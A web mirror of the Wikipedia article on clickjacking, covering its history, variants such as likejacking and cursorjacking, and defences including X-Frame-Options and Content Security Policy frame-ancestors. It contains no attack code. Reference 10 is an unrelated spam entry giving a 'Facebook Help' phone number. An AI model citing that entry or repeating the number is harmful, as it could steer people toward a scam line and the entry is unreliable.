Clickjacking

Last updated

In a clickjacking attack, the user is presented with a false interface, where their input is applied to something they cannot see Clickjacking.png
In a clickjacking attack, the user is presented with a false interface, where their input is applied to something they cannot see

Clickjacking (classified as a user interface redress attack or UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. [1] [2] [3] [4] [5]

Contents

Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority. [6]

History

In 2002, it had been noted that it was possible to load a transparent layer over a web page and have the user's input affect the transparent layer without the user noticing. [7] However, fixes only started to trickle in around 2004, [8] and the general problem was mostly ignored as a major issue until 2008. [7]

In 2008, Jeremiah Grossman and Robert Hansen (of SecTheory) had discovered that Adobe Flash Player was able to be clickjacked, allowing an attacker to gain access to a user's computer without the user's knowledge. [7] Grossman and Hansen coined the term "clickjacking", [9] [10] a portmanteau of the words "click" and "hijacking". [7]

As more attacks of a similar nature were discovered, the focus of the term "UI redressing" was changed to describe the category of these attacks, rather than just clickjacking itself. [7]

Description

One form of clickjacking takes advantage of vulnerabilities that are present in applications or web pages to allow the attacker to manipulate the user's computer for their own advantage.

For example, a clickjacked page tricks a user into performing undesired actions by clicking on concealed links. On a clickjacked page, the attackers load another page over the original page in a transparent layer to trick the user into taking actions, the outcomes of which will not be the same as the user expects. The unsuspecting users think that they are clicking visible buttons, while they are actually performing actions on the invisible page, clicking buttons of the page below the layer. The hidden page may be an authentication page; therefore, the attackers can trick users into performing actions which the users never intended. There is no way of tracing such actions to the attackers later, as the users would have been genuinely authenticated on the hidden page.

Clickjacking categories

Classic

Classic clickjacking refers to a situation when an attacker uses hidden layers on web pages to manipulate the actions a user's cursor does, resulting in misleading the user about what truly is being clicked on. [18]

A user might receive an email with a link to a video about a news item, but another webpage, say a product page on Amazon, can be "hidden" on top or underneath the "PLAY" button of the news video. The user tries to "play" the video but actually "buys" the product from Amazon. The hacker can only send a single click, so they rely on the fact that the visitor is both logged into Amazon and has 1-click ordering enabled.

While technical implementation of these attacks may be challenging due to cross-browser incompatibilities, a number of tools such as BeEF or Metasploit Project offer almost fully automated exploitation of clients on vulnerable websites. Clickjacking may be facilitated by – or may facilitate – other web attacks, such as XSS. [19] [20]

Likejacking

Likejacking is a malicious technique of tricking users viewing a website into "liking" a Facebook page or other social media posts/accounts that they did not intentionally mean to "like". [21] The term "likejacking" came from a comment posted by Corey Ballou in the article How to "Like" Anything on the Web (Safely), [22] which is one of the first documented postings explaining the possibility of malicious activity regarding Facebook's "like" button. [23]

According to an article in IEEE Spectrum , a solution to likejacking was developed at one of Facebook's hackathons. [24] A "Like" bookmarklet is available that avoids the possibility of likejacking present in the Facebook like button. [25]

Nested

Nested clickjacking, compared to classic clickjacking, works by embedding a malicious web frame between two frames of the original, harmless web page: that from the framed page and that which is displayed on the top window. This works due to a vulnerability in the HTTP header X-Frame-Options, in which, when this element has the value SAMEORIGIN, the web browser only checks the two aforementioned layers. The fact that additional frames can be added in between these two while remaining undetected means that attackers can use this for their benefit.

In the past, with Google+ and the faulty version of X-Frame-Options, attackers were able to insert frames of their choice by using the vulnerability present in Google's Image Search engine. In between the image display frames, which were present in Google+ as well, these attacker-controlled frames were able to load and not be restricted, allowing for the attackers to mislead whomever came upon the image display page. [13]

Cursorjacking

CursorJacking is a UI redressing technique to change the cursor from the location the user perceives, discovered in 2010 by Eddy Bordi, a researcher at vulnerability.fr. [26] Marcus Niemietz demonstrated this with a custom cursor icon, and in 2012 Mario Heiderich did so by hiding the cursor. [27]

Jordi Chancel, a researcher at Alternativ-Testing.fr, discovered a CursorJacking vulnerability using Flash, HTML and JavaScript code in Mozilla Firefox on Mac OS X systems (fixed in Firefox 30.0) which can lead to arbitrary code execution and webcam spying. [28]

A second CursorJacking vulnerability was again discovered by Jordi Chancel in Mozilla Firefox on Mac OS X systems (fixed in Firefox 37.0) using once again Flash, HTML and JavaScript code which can also lead to spying via a webcam and the execution of a malicious addon, allowing the execution of malware on the affected user's computer. [29]

MouseJack

Different from other clickjacking techniques that redress a UI, MouseJack is a wireless hardware-based UI vulnerability first reported by Marc Newlin of Bastille.net in 2016 which allows external keyboard input to be injected into vulnerable dongles. [30] Logitech supplied firmware patches but other manufacturers failed to respond to this vulnerability. [31]

Browserless

In Browserless clickjacking, attackers utilize vulnerabilities in programs to replicate classic clickjacking in them, without being required to use the presence of a web browser.

This method of clickjacking is mainly prevalent among mobile devices, usually on Android devices, especially due to the way in which toast notifications work. Because toast notifications have a small delay in between the moment the notification is requested and the moment the notification actually displays on-screen, attackers are capable of using that gap to create a dummy button that lies hidden underneath the notification and can still be clicked on. [7]

CookieJacking

CookieJacking is a form of clickjacking in which cookies are stolen from the victim's web browsers. This is done by tricking the user into dragging an object which seemingly appears harmless but is in fact making the user select the entire content of the cookie being targeted. From there, the attacker can acquire the cookie and all of the data that it possesses. [15] [ clarification needed ]

FileJacking

In fileJacking, attackers use the web browser's capability to navigate through the computer and access computer files in order to acquire personal data. It does so by tricking the user into establishing an active file server (through the file and folder selection window that browsers use). With this, attackers can now access and take files from their victims' computers. [16]

Password manager attack

A 2014 paper from researcher at the Carnegie Mellon University found that while browsers refuse to autofill if the protocol on the current login page is different from the protocol at the time the password was saved, some password managers would insecurely fill in passwords for the http version of https-saved passwords. Most managers did not protect against iFrame- and redirection-based attacks and exposed additional passwords where password synchronization had been used between multiple devices. [17]

Prevention

Client-side

NoScript

Protection against clickjacking (including likejacking) can be added to Mozilla Firefox desktop and mobile [32] versions by installing the NoScript add-on: its ClearClick feature, released on 8 October 2008, prevents users from clicking on invisible or "redressed" page elements of embedded documents or applets. [33] According to Google's "Browser Security Handbook" from 2008, NoScript's ClearClick is a "freely available product that offers a reasonable degree of protection" against Clickjacking. [34] Protection from the newer cursorjacking attack was added to NoScript 2.2.8 RC1. [27]


GuardedID

GuardedID (a commercial product) includes client-side clickjack protection for users of Internet Explorer without interfering with the operation of legitimate iFrames. [35] GuardedID clickjack protection forces all frames to become visible. GuardedID teams[ clarification needed ] with the add-on NoClickjack to add protection for Google Chrome, Mozilla Firefox, Opera and Microsoft Edge.

Gazelle

Gazelle is a Microsoft Research project secure web browser based on IE, that uses an OS-like security model and has its own limited defenses against clickjacking. [36] In Gazelle, a window of different origin may only draw dynamic content over another window's screen space if the content it draws is opaque.

Intersection Observer v2

The Intersection Observer v2 API [37] introduces the concept of tracking the actual "visibility" of a target element as a human being would define it. [38] This allows a framed widget to detect when it's being covered. The feature is enabled by default since Google Chrome 74, released in April 2019. [39] The API is also implemented by other Chromium-based browsers, such as Microsoft Edge and Opera.

Server-side

Framekiller

Web site owners can protect their users against UI redressing (frame based clickjacking) on the server side by including a framekiller JavaScript snippet in those pages they do not want to be included inside frames from different sources. [34]

Such JavaScript-based protection is not always reliable. This is especially true on Internet Explorer, [34] where this kind of countermeasure can be circumvented "by design" by including the targeted page inside an <IFRAMESECURITY=restricted> element. [40]

X-Frame-Options

Introduced in 2009 in Internet Explorer 8 was a new HTTP header X-Frame-Options which offered a partial protection against clickjacking [41] [42] and was adopted by other browsers (Safari, [43] Firefox, [44] Chrome, [45] and Opera [46] ) shortly afterwards. The header, when set by website owner, declares its preferred framing policy: values of DENY, ALLOW-FROM origin, or SAMEORIGIN will prevent any framing, framing by external sites, or allow framing only by the specified site, respectively. In addition to that, some advertising sites return a non-standard ALLOWALL value with the intention to allow framing their content on any page (equivalent of not setting X-Frame-Options at all).

In 2013 the X-Frame-Options header has been officially published as RFC 7034, [47] but is not an Internet standard. The document is provided for informational purposes only. The W3C's Content Security Policy Level 2 Recommendation provides an alternative security directive, frame-ancestors, which is intended to obsolete the X-Frame-Options header. [48]

A security header like X-Frame-Options will not protect users against clickjacking attacks that are not using a frame. [49]

Content Security Policy

The frame-ancestors directive of Content Security Policy (introduced in version 1.1) can allow or disallow embedding of content by potentially hostile pages using iframe, object, etc. This directive obsoletes the X-Frame-Options directive. If a page is served with both headers, the frame-ancestors policy should be preferred by the browser. [50] —although some popular browsers disobey this requirement. [51]

Example frame-ancestors policies:

# Disallow embedding. All iframes etc. will be blank, or contain a browser specific error page. Content-Security-Policy: frame-ancestors 'none'
# Allow embedding of own content only. Content-Security-Policy: frame-ancestors 'self'
# Allow specific origins to embed this content Content-Security-Policy: frame-ancestors www.example.com www.wikipedia.org

See also

Related Research Articles

<span class="mw-page-title-main">HTTPS</span> Extension of the HTTP communications protocol to support TLS encryption

Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It uses encryption for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security (TLS) or, formerly, Secure Sockets Layer (SSL). The protocol is therefore also referred to as HTTP over TLS, or HTTP over SSL.

<span class="mw-page-title-main">Web browser</span> Software used to access websites

A web browser is an application for accessing websites. When a user requests a web page from a particular website, the browser retrieves its files from a web server and then displays the page on the user's screen. Browsers are used on a range of devices, including desktops, laptops, tablets, and smartphones. By 2020, an estimated 4.9 billion people had used a browser. The most-used browser is Google Chrome, with a 66% global market share on all devices, followed by Safari with 18%.

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. During the second half of 2007, XSSed documented 11,253 site-specific cross-site vulnerabilities, compared to 2,134 "traditional" vulnerabilities documented by Symantec. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.

In computing, the User-Agent header is an HTTP header intended to identify the user agent responsible for making a given HTTP request. Whereas the character sequence User-Agent comprises the name of the header itself, the header value that a given user agent uses to identify itself is colloquially known as its user agent string. The user agent for the operator of a computer used to access the Web has encoded within the rules that govern its behavior the knowledge of how to negotiate its half of a request-response transaction; the user agent thus plays the role of the client in a client–server system. Often considered useful in networks is the ability to identify and distinguish the software facilitating a network session. For this reason, the User-Agent HTTP header exists to identify the client software to the responding server.

A framekiller is a technique used by websites and web applications to prevent their web pages from being displayed within a frame. A frame is a subdivision of a Web browser window and can act like a smaller window. A framekiller is usually used to prevent a website from being loaded from within a frameset without permission or as an attack, as with clickjacking.

MHTML, an initialism of "MIME encapsulation of aggregate HTML documents", is a Web archive file format used to combine, in a single computer file, the HTML code and its companion resources that are represented by external hyperlinks in the web page's HTML code. The content of an MHTML file is encoded using the same techniques that were first developed for HTML email messages, using the MIME content type multipart/related. MHTML files use an .mhtml or .mht filename extension.

This is a comparison of both historical and current web browsers based on developer, engine, platform(s), releases, license, and cost.

<span class="mw-page-title-main">Netscape Browser</span> Internet browser

Netscape Browser is the eighth major release of the Netscape series of web browsers, now all discontinued. It was published by AOL, but developed by Mercurial Communications, and originally released for Windows on May 19, 2005.

NoScript is a free and open-source extension for Firefox- and Chromium-based web browsers, written and maintained by Giorgio Maone, a software developer and member of the Mozilla Security Group.

In HTTP networking, typically on the World Wide Web, referer spoofing sends incorrect referer information in an HTTP request in order to prevent a website from obtaining accurate data on the identity of the web page previously visited by the user.

<span class="mw-page-title-main">HTTP referer</span> HTTP header field

In HTTP, "Referer" is an optional HTTP header field that identifies the address of the web page from which the resource has been requested. By checking the referrer, the server providing the new web page can see where the request originated.

<span class="mw-page-title-main">Firefox 4</span> Firefox browser released in 2011

Mozilla Firefox 4 is a version of the Firefox web browser, released on March 22, 2011. The first beta was made available on July 6, 2010; Release Candidate 2 was released on March 18, 2011. It was codenamed Tumucumaque, and was Firefox's last large release cycle. The Mozilla team planned smaller and quicker releases following other browser vendors. The primary goals for this version included improvements in performance, standards support, and user interface.

HTTP Strict Transport Security (HSTS) is a policy mechanism that helps to protect websites against man-in-the-middle attacks such as protocol downgrade attacks and cookie hijacking. It allows web servers to declare that web browsers should automatically interact with it using only HTTPS connections, which provide Transport Layer Security (TLS/SSL), unlike the insecure HTTP used alone. HSTS is an IETF standards track protocol and is specified in RFC 6797.

<span class="mw-page-title-main">Firefox 3.6</span> Firefox web browser version

Mozilla Firefox 3.6 is a version of the Firefox web browser released in January 2010. The release's main improvement over Firefox 3.5 is improved performance. It uses the Gecko 1.9.2 engine, which improves compliance with web standards. It was codenamed Namoroka. In this version, support for X BitMap images was dropped.

Firesheep was an extension for the Firefox web browser that used a packet sniffer to intercept unencrypted session cookies from websites such as Facebook and Twitter. The plugin eavesdropped on Wi-Fi communications, listening for session cookies. When it detected a session cookie, the tool used this cookie to obtain the identity belonging to that session. The collected identities (victims) are displayed in a side bar in Firefox. By clicking on a victim's name, the victim's session is taken over by the attacker.

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website or web application where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript fetch or XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account.

Content Security Policy (CSP) is a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from execution of malicious content in the trusted web page context. It is a Candidate Recommendation of the W3C working group on Web Application Security, widely supported by modern web browsers. CSP provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on that website—covered types are JavaScript, CSS, HTML frames, web workers, fonts, images, embeddable objects such as Java applets, ActiveX, audio and video files, and other HTML5 features.

Firefox was created by Dave Hyatt and Blake Ross as an experimental branch of the Mozilla browser, first released as Firefox 1.0 on November 9, 2004. Starting with version 5.0, a rapid release cycle was put into effect, resulting in a new major version release every six weeks. This was gradually accelerated further in late 2019, so that new major releases occur on four-week cycles starting in 2020.

Browser security is the application of Internet security to web browsers in order to protect networked data and computer systems from breaches of privacy or malware. Security exploits of browsers often use JavaScript, sometimes with cross-site scripting (XSS) with a secondary payload using Adobe Flash. Security exploits can also take advantage of vulnerabilities that are commonly exploited in all browsers.

References

  1. Robert McMillan (17 September 2008). "At Adobe's request, hackers nix 'clickjacking' talk". PC World. Archived from the original on 17 July 2015. Retrieved 8 October 2008.
  2. Megha Dhawan (29 September 2008). "Beware, clickjackers on the prowl". The Times of India. Archived from the original on 24 July 2009. Retrieved 8 October 2008.
  3. Dan Goodin (7 October 2008). "Net game turns PC into undercover surveillance zombie". The Register. Retrieved 8 October 2008.
  4. Fredrick Lane (8 October 2008). "Web Surfers Face Dangerous New Threat: 'Clickjacking'". newsfactor.com. Archived from the original on 13 October 2008. Retrieved 8 October 2008.
  5. Shahriar, Hossain; Devendran, Vamshee Krishna (4 July 2014). "Classification of Clickjacking Attacks and Detection Techniques". Information Security Journal: A Global Perspective. 23 (4–6): 137–147. doi:10.1080/19393555.2014.931489. ISSN   1939-3555. S2CID   43912852.
  6. The Confused Deputy rides again!, Tyler Close, October 2008
  7. 1 2 3 4 5 6 7 8 9 10 11 12 Niemietz, Marcus (2012). "UI Redressing Attacks on Android Devices" (PDF). Black Hat.
  8. "162020 - pop up XPInstall/security dialog when user is about to click (comment 44)". Mozilla/Firefox bug tracker.
  9. You don't know (click)jack Robert Lemos, October 2008
  10. JAstine, Berry. "Facebook Help Number 1-888-996-3777" . Retrieved 7 June 2016.
  11. "Viral clickjacking 'Like' worm hits Facebook users". Naked Security. 31 May 2010. Retrieved 23 October 2018.
  12. "Facebook Worm – "Likejacking"". Naked Security. 31 May 2010. Retrieved 23 October 2018.
  13. 1 2 Lekies, Sebastian (2012). "On the fragility and limitations of current Browser-provided Clickjacking protection schemes" (PDF). USENIX.
  14. "Wireless Mouse Hacks & Network Security Protection". MOUSEJACK. Retrieved 3 January 2020.
  15. 1 2 Valotta, Rosario (2011). "Cookiejacking". tentacoloViola – sites.google.com. Archived from the original on 7 August 2019. Retrieved 23 October 2018.
  16. 1 2 "Filejacking: How to make a file server from your browser (with HTML5 of course)". blog.kotowicz.net. Retrieved 23 October 2018.
  17. 1 2 "Password Managers: Attacks and Defenses" (PDF). Retrieved 26 July 2015.
  18. Sahani, Rishabh; Randhawa, Sukhchandan (1 December 2021). "Clickjacking: Beware of Clicking". Wireless Personal Communications. 121 (4): 2845–2855. doi:10.1007/s11277-021-08852-y. ISSN   0929-6212. S2CID   239691334.
  19. "The Clickjacking meets XSS: a state of art". Exploit DB. 26 December 2008. Retrieved 31 March 2015.
  20. Krzysztof Kotowicz. "Exploiting the unexploitable XSS with clickjacking" . Retrieved 31 March 2015.
  21. Cohen, Richard (31 May 2010). "Facebook Work – "Likejacking"". Sophos. Archived from the original on 4 June 2010. Retrieved 5 June 2010.
  22. Ballou, Corey (2 June 2010). ""Likejacking" Term Catches On". jqueryin.com. Archived from the original on 5 June 2010. Retrieved 8 June 2010.
  23. Perez, Sarah (2 June 2010). ""Likejacking" Takes Off on Facebook". ReadWriteWeb. Archived from the original on 16 August 2011. Retrieved 5 June 2010.
  24. Kushner, David (June 2011). "Facebook Philosophy: Move Fast and Break Things". IEEE. Archived from the original on 7 June 2011. Retrieved 15 July 2011.
  25. Perez, Sarah (23 April 2010). "How to "Like" Anything on the Web (Safely)". ReadWriteWeb. Retrieved 24 August 2011.
  26. Podlipensky, Paul. "Cursor Spoofing and Cursorjacking". Podlipensky.com. Paul Podlipensky. Archived from the original on 22 November 2017. Retrieved 22 November 2017.
  27. 1 2 Krzysztof Kotowicz (18 January 2012). "Cursorjacking Again" . Retrieved 31 January 2012.
  28. "Mozilla Foundation Security Advisory 2014-50". Mozilla. Retrieved 17 August 2014.
  29. "Mozilla Foundation Security Advisory 2015-35". Mozilla. Retrieved 25 October 2015.
  30. "What is MouseJack!". Bastille. Retrieved 3 January 2020.
  31. "CERT VU#981271 Multiple wireless keyboard/mouse devices use an unsafe proprietary wireless protocol". kb.cert.org. Retrieved 3 January 2020.
  32. Giorgio Maone (24 June 2011). "NoScript Anywhere". hackademix.net. Retrieved 30 June 2011.
  33. Giorgio Maone (8 October 2008). "Hello ClearClick, Goodbye Clickjacking". hackademix.net. Retrieved 27 October 2008.
  34. 1 2 3 Michal Zalevski (10 December 2008). "Browser Security Handbook, Part 2, UI Redressing". Google Inc. Retrieved 27 October 2008.
  35. Robert Hansen (4 February 2009). "Clickjacking and GuardedID ha.ckers.org web application security lab". Archived from the original on 11 July 2012. Retrieved 30 November 2011.
  36. Wang, Helen J.; Grier, Chris; Moschchuk, Alexander; King, Samuel T.; Choudhury, Piali; Venter, Herman (August 2009). "The Multi-Principal OS Construction of the Gazelle Web Browser" (PDF). 18th Usenix Security Symposium, Montreal, Canada. Retrieved 26 January 2010.
  37. "Intersection Observer – W3C Editor's Draft".
  38. "Trust is Good, Observation is Better".
  39. "De-anonymization via Clickjacking in 2019".
  40. Giorgio Maone (27 October 2008). "Hey IE8, I Can Has Some Clickjacking Protection". hackademix.net. Retrieved 27 October 2008.
  41. Eric Lawrence (27 January 2009). "IE8 Security Part VII: ClickJacking Defenses" . Retrieved 30 December 2010.
  42. Eric Lawrence (30 March 2010). "Combating ClickJacking With X-Frame-Options" . Retrieved 30 December 2010.
  43. Ryan Naraine (8 June 2009). "Apple Safari jumbo patch: 50+ vulnerabilities fixed". Archived from the original on 12 June 2009. Retrieved 10 June 2009.
  44. https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header Archived 7 October 2010 at the Wayback Machine The X-Frame-Options response header — MDC
  45. Adam Barth (26 January 2010). "Security in Depth: New Security Features" . Retrieved 26 January 2010.
  46. "Web specifications support in Opera Presto 2.6". 12 October 2010. Archived from the original on 14 January 2012. Retrieved 22 January 2012.
  47. "HTTP Header Field X-Frame-Options". IETF. 2013.
  48. "Content Security Policy Level 2". W3C. 2016.
  49. "lcamtuf's blog: X-Frame-Options, or solving the wrong problem". 10 December 2011.
  50. "Content Security Policy Level 2". w3.org. 2 July 2014. Retrieved 29 January 2015.
  51. "Clickjacking Defense Cheat Sheet" . Retrieved 15 January 2016.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.